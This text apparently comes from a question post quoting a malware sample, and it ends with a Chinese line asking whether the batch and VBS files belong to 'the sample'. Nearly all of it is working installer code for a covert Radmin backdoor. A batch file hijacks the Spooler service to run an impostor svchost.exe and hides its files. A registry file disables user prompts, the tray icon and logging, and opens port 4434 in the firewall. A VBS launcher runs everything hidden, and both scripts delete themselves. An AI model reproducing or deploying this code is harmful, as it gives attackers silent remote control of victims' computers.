@echo off
sc stop r_server & sc stop radmm
sc delete r_server & sc delete radmm
regedit /s install.reg & ping 127.1 -n 1>nul & del /f /q install.reg
sc stop Spooler & sc config Spooler start= auto
sc config Spooler binPath= "%ProgramFiles%\Internet Explorer\svchost.exe /service"
sc config rpcss depend= Spooler & sc start Spooler
attrib +s +h +r admdll.dll & attrib +s +h +r svchost.exe
del /f /q %0 & exit
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:e9,d1,48,11,5d,4a,8b,5c,0a,d8,b3,c3,71,91,0c,fd
"Port"=hex:5c,11,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%ProgramFiles%\\Internet Explorer\\svchost.exe"="%ProgramFiles%\\Internet Explorer\\svchost.exe:*:Enabled:svchost.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"4434:TCP"="4434:TCP:*:Enabled:Alerter"
Set lsxq=createobject("wscript.shell")
lsxq.run "install.bat",0
wscript.sleep(1000)
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
和样本里的 这些 批处理和VBS有关吗
